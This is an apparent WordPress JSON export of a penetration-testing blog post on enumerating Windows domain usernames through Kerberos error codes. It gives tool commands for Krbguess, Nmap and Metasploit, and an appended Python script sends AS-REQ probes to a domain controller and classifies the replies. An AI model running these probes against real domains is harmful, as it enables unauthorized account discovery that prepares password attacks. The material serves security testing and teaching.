{"id":311,"date":"2016-11-09T16:45:18","date_gmt":"2016-11-09T16:45:18","guid":{"rendered":"https:\/\/www.attackdebris.com\/?p=311"},"modified":"2017-05-30T21:24:57","modified_gmt":"2017-05-30T20:24:57","slug":"kerberos-domain-username-enumeration","status":"publish","type":"post","link":"https:\/\/www.attackdebris.com\/?p=311","title":{"rendered":"Kerberos Domain Username Enumeration"},"content":{"rendered":"<p><strong>Kerberos Domain Username Enumeration<\/strong><\/p>\n<p>Over recent years, enumerating valid operating system level user names from up-to-date and well-maintained Windows environments, even from an internal test perspective, has become increasingly difficult. Where RID cycling once provided a full list of domain users from an unauthenticated perspective, this is generally no longer the case.<\/p>\n<p>However, on internal assessments the Kerberos service (88\/tcp) still provides a happy hunting ground for enumerating domain account names.<\/p>\n<p>The enumeration works because a KDC answers an AS-REQ that carries no pre-authentication data with a different error code depending on the state of the requested principal:<\/p>\n<table width=\"616\">\n<tbody>\n<tr>\n<td width=\"128\"><strong>User Status<\/strong><\/td>\n<td width=\"488\"><strong>Kerberos Error (RFC 4120 code)<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"128\">Present \/ Enabled<\/td>\n<td width=\"488\">KDC_ERR_PREAUTH_REQUIRED (25) &#8211; Additional pre-authentication required<\/td>\n<\/tr>\n<tr>\n<td width=\"128\">Locked \/ Disabled<\/td>\n<td width=\"488\">KDC_ERR_CLIENT_REVOKED (18) &#8211; Clients credentials have been revoked<\/td>\n<\/tr>\n<tr>\n<td width=\"128\">Does not exist<\/td>\n<td width=\"488\">KDC_ERR_C_PRINCIPAL_UNKNOWN (6) &#8211; Client not found in Kerberos database<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>One caveat: an account that does not require Kerberos pre-authentication (the DONT_REQ_PREAUTH flag in userAccountControl) is answered with an AS-REP rather than KDC_ERR_PREAUTH_REQUIRED, which still confirms that the account exists and is enabled. Each guess is also a separate AS-REQ that the domain controller can audit, so keep user lists targeted.<\/p>\n<p>Several good tools, which have been around for some time, use these Kerberos responses to identify valid and invalid domain accounts.<\/p>\n<p>Both of the tools I have been 
leveraging up until now were written by Patrik Karlsson: the first is the standalone Java tool Krbguess, the second the krb5-enum-users NSE script for Nmap.<\/p>\n<p><strong><u>Krbguess<\/u><\/strong><\/p>\n<p>Usage:<\/p>\n<p><strong>java -jar kerbguess.jar -r [domain] -d [user list] -s [DC IP]<\/strong><\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/krbguess.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-313\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/krbguess.jpg\" alt=\"krbguess\" width=\"1016\" height=\"153\" \/><\/a><\/p>\n<p><u><strong>Nmap krb5-enum-users NSE Script<\/strong><\/u><\/p>\n<p>Usage:<\/p>\n<p><strong>nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='[domain]',userdb=[user list] [DC IP]<\/strong><\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/nmap_kerberos_enum-1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-315\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/nmap_kerberos_enum-1.jpg\" alt=\"nmap_kerberos_enum\" width=\"1236\" height=\"277\" \/><\/a><\/p>\n<p><strong><span style=\"text-decoration: underline;\">Metasploit Module: auxiliary\/gather\/kerberos_enumusers<\/span><\/strong><\/p>\n<p>Like most penetration testers I\u2019m a heavy user of the Metasploit Framework, and for years I have wanted to be able to leverage this functionality from within the framework. 
For whatever reason it never seems to have been implemented, so I decided to have a go at implementing it myself.<\/p>\n<p>Leaning heavily on the Kerberos support provided by other Metasploit contributors, and using the ms14_068_kerberos_checksum auxiliary module as a template, the process was actually a lot simpler than I had anticipated.<\/p>\n<p>The new Metasploit auxiliary module can be found in the following location:<\/p>\n<p><strong>auxiliary\/gather\/kerberos_enumusers<\/strong><\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers1.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-316\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers1.jpg\" alt=\"kerberos_enumusers1\" width=\"860\" height=\"259\" \/><\/a><\/p>\n<p>As with the previously discussed Kerberos enumeration tools, three values need to be provided:<\/p>\n<ol>\n<li>Domain Name (DOMAIN)<\/li>\n<li>Domain Controller IP (RHOST)<\/li>\n<li>User list (USER_FILE)<\/li>\n<\/ol>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-317\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers2.jpg\" alt=\"kerberos_enumusers2\" width=\"595\" height=\"112\" \/><\/a><\/p>\n<p>The module can then be run to enumerate valid (and disabled\/locked) domain accounts via the Kerberos service:<\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers3.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-318\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers3.jpg\" alt=\"kerberos_enumusers3\" width=\"818\" height=\"491\" \/><\/a><\/p>\n<p>Finally, and thanks to an addition by bwatters-r7 at Rapid7, any valid enumerated usernames are stored in 
the Metasploit database and can be retrieved via the \u2018creds\u2019 command:<\/p>\n<p><a href=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers4.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-319\" src=\"https:\/\/www.attackdebris.com\/wp-content\/uploads\/2016\/11\/kerberos_enumusers4.jpg\" alt=\"kerberos_enumusers4\" width=\"768\" height=\"180\" \/><\/a><\/p>\n<p>References:<\/p>\n<p><a href=\"http:\/\/www.cqure.net\/wp\/tools\/password-recovery\/krbguess\/\"><em>http:\/\/www.cqure.net\/wp\/tools\/password-recovery\/krbguess\/<\/em><\/a><\/p>\n<p><a href=\"https:\/\/nmap.org\/nsedoc\/scripts\/krb5-enum-users.html\"><em>https:\/\/nmap.org\/nsedoc\/scripts\/krb5-enum-users.html<\/em><\/a><\/p>\n<p><a href=\"https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/kerberos\/ms14_068_kerberos_checksum\"><em>https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/admin\/kerberos\/ms14_068_kerberos_checksum<\/em><\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Kerberos Domain Username Enumeration Over recent years enumerating valid operating system level user names from up-to-date and well-maintained Windows environments, even from an internal test perspective, has become increasingly unlikely. Where RID cycling once provided us with a full list of domain users from an unauthenticated perspective, this is generally no longer the case. 
However, &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/www.attackdebris.com\/?p=311\">Continue reading<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":true,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[1],"tags":[],"class_list":["post-311","post","type-post","status-publish","format-standard","hentry","category-tools","item-wrap"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p3MDvd-51","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/posts\/311","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=311"}],"version-history":[{"count":7,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/posts\/311\/revisions"}],"predecessor-version":[{"id":330,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=\/wp\/v2\/posts\/311\/revisions\/330"}],"wp:attachment":[{"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=311"}],"w
p:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.attackdebris.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
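The exchange the post's error-code table describes, written out as an added example that is not part of the original post and not the code of Krbguess, the NSE script or the Metasploit module: a standard-library-only Python probe that builds an AS-REQ with no pre-authentication data, sends it to a KDC on 88/tcp and classifies the reply by the KRB-ERROR code (6, 18, 25). It also covers the case the table leaves out, an AS-REP coming straight back for an account that does not require pre-authentication. The realm EXAMPLE.LOCAL, the nonce, the etype list and the constructed KRB-ERROR used for offline checks are assumptions, not captured traffic.

```python
"""Kerberos AS-REQ username probe: build the request, classify the KDC reply (stdlib only)."""
import socket
import struct
import time

# KDC error codes (RFC 4120 section 7.5.9) whose difference leaks account state
KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_CLIENT_REVOKED, KDC_ERR_PREAUTH_REQUIRED = 6, 18, 25
APP_AS_REQ, APP_AS_REP, APP_KRB_ERROR = 10, 11, 30   # [APPLICATION n] message tags


def der(tag, content):
    """Encode one DER TLV; long-form lengths up to 65535 bytes."""
    n = len(content)
    length = (bytes([n]) if n < 0x80 else
              b"\x81" + bytes([n]) if n < 0x100 else b"\x82" + struct.pack(">H", n))
    return bytes([tag]) + length + content

def ctx(n, content):      # context-specific constructed tag [n]
    return der(0xA0 | n, content)

def app(n, content):      # [APPLICATION n], constructed
    return der(0x60 | n, content)

def integer(v):           # minimal two's-complement INTEGER
    return der(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))

def gen_string(s):        # KerberosString is a GeneralString
    return der(0x1B, s.encode("ascii"))

def sequence(*items):
    return der(0x30, b"".join(items))

def principal(name_type, *parts):
    """PrincipalName ::= SEQUENCE { name-type [0] Int32, name-string [1] SEQUENCE OF KerberosString }"""
    return sequence(ctx(0, integer(name_type)), ctx(1, sequence(*[gen_string(p) for p in parts])))

def build_as_req(realm, username, nonce=0x1234ABCD):
    """AS-REQ for username@realm with NO padata: the KDC's reply alone reveals the account state."""
    kdc_options = der(0x03, b"\x00" + struct.pack(">I", 0x40800000))   # BIT STRING: forwardable | renewable
    body = sequence(
        ctx(0, kdc_options),
        ctx(1, principal(1, username)),              # cname, NT-PRINCIPAL
        ctx(2, gen_string(realm)),                   # realm
        ctx(3, principal(2, "krbtgt", realm)),       # sname, NT-SRV-INST
        ctx(5, der(0x18, b"20370913024805Z")),       # till, KerberosTime
        ctx(7, integer(nonce)),
        ctx(8, sequence(integer(18), integer(17), integer(23))))   # etype: AES256, AES128, RC4 (assumed list)
    return app(APP_AS_REQ, sequence(ctx(1, integer(5)), ctx(2, integer(APP_AS_REQ)), ctx(4, body)))

def parse_tlv(buf, pos=0):
    """Decode the TLV at pos -> (tag, value bytes, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                # long-form length
        nbytes = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes
    return tag, buf[pos:pos + length], pos + length

def classify_kdc_reply(reply):
    """Map a raw KDC reply (AS-REP or KRB-ERROR, no TCP length prefix) to an account status string."""
    tag, content, _ = parse_tlv(reply)
    if tag == 0x60 | APP_AS_REP:                     # no pre-auth demanded: exists, enabled, DONT_REQ_PREAUTH set
        return "present / enabled (no pre-auth required)"
    if tag != 0x60 | APP_KRB_ERROR:
        return "unexpected reply"
    _, fields, _ = parse_tlv(content)                # the KRB-ERROR SEQUENCE body
    pos = 0
    while pos < len(fields):
        ftag, fval, pos = parse_tlv(fields, pos)
        if ftag == 0xA0 | 6:                         # error-code [6] Int32
            code = int.from_bytes(parse_tlv(fval)[1], "big", signed=True)
            return {KDC_ERR_PREAUTH_REQUIRED: "present / enabled",
                    KDC_ERR_CLIENT_REVOKED: "locked / disabled",
                    KDC_ERR_C_PRINCIPAL_UNKNOWN: "does not exist"}.get(code, "kdc error %d" % code)
    return "malformed KRB-ERROR"

def sample_krb_error(code, realm="EXAMPLE.LOCAL"):
    """Constructed KRB-ERROR (not captured from a real DC) so the classifier can be exercised offline."""
    stime = der(0x18, time.strftime("%Y%m%d%H%M%SZ", time.gmtime()).encode("ascii"))
    return app(APP_KRB_ERROR, sequence(
        ctx(0, integer(5)), ctx(1, integer(APP_KRB_ERROR)), ctx(4, stime), ctx(5, integer(0)),
        ctx(6, integer(code)), ctx(9, gen_string(realm)), ctx(10, principal(2, "krbtgt", realm))))

def enum_users(dc_ip, realm, users, timeout=3.0):
    """One AS-REQ per candidate over 88/tcp (4-byte big-endian length prefix); returns {user: status}."""
    results = {}
    for user in users:
        req = build_as_req(realm, user)
        with socket.create_connection((dc_ip, 88), timeout=timeout) as s:
            s.sendall(struct.pack(">I", len(req)) + req)
            need, data = struct.unpack(">I", s.recv(4))[0] & 0x7FFFFFFF, b""
            while len(data) < need:
                chunk = s.recv(need - len(data))
                if not chunk:
                    break
                data += chunk
        results[user] = classify_kdc_reply(data)
    return results
```

Against a live domain controller, `enum_users("10.0.0.5", "EXAMPLE.LOCAL", ["administrator", "nobody"])` (address and realm assumed) returns one status per candidate; offline, `classify_kdc_reply(sample_krb_error(25))` exercises the same classifier against a constructed error. The message walker is deliberately minimal: it only looks for the `[6]` error-code field and reads the outer tag to tell AS-REP from KRB-ERROR, which is all that the three table rows plus the no-pre-auth case need.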